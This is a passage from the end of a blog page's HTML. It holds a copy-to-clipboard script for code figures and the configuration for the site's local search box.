          var figcaption = figure.querySelector('figcaption');

          if (figcaption) {
            figcaption.append(copyButton[0]);
          } else {
            figure.prepend(copyButton[0]);
          }
        })

        var clipboard = new ClipboardJS('.clipboard-btn', {
          target: function(trigger) {
            return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
          }
        });
        clipboard.on('success', function(e) {
          e.clearSelection();
        })
      })
    </script>

    
    

    



<script src="/js/script.js"></script>


    
    <div class="searchbox ins-search">
    <div class="searchbox-mask"></div>
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="Type something..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: 'Posts',
                PAGES: 'Pages',
                CATEGORIES: 'Categories',
                TAGS: 'Tags',
                UNTITLED: '(Untitled)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>

<script src="/js/insight.js"></script>

    
</body>
</html>